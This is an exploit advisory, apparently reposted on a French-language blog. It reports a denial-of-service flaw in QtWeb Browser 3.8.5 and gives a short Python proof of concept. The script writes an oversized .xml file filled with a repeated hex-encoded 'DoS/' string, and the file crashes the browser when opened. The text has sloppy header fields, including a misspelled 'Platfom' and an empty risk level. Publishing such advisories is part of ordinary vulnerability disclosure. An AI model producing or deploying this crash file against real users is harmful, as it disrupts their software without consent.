QtWeb Browser 3.8.5 – (.xml)/Denial of Service Exploit

A Denial Of Service vulnerability has been discovered in the official QtWeb Browser v3.8.5 The browser’s web vulnerability can be exploited by remote attackers without a privileged user account and with low user interaction. Just create a file in (.xml) is the opening with the browser that will cause a Denial of Service.

(Copy of the Vendor Homepage: http://www.qtweb.net/ )

Date of Discovery:
==================

2018-08-24

Exploitation Technique:
=======================

Local

Platfom Tested:
===============

Windows 7

Levels Risk:

Proof of Concept (PoC):
=======================

#!/usr/bin/python

buff = "\x44\x6f\x53/" * 20000000

poc = buff 
file = open("PoC.xml","w")
file.write(poc)
file.close()
 
print "POC Created by ZwX"

Soyez le premier à commenter

Poster un Commentaire

Votre adresse de messagerie ne sera pas publiée.


*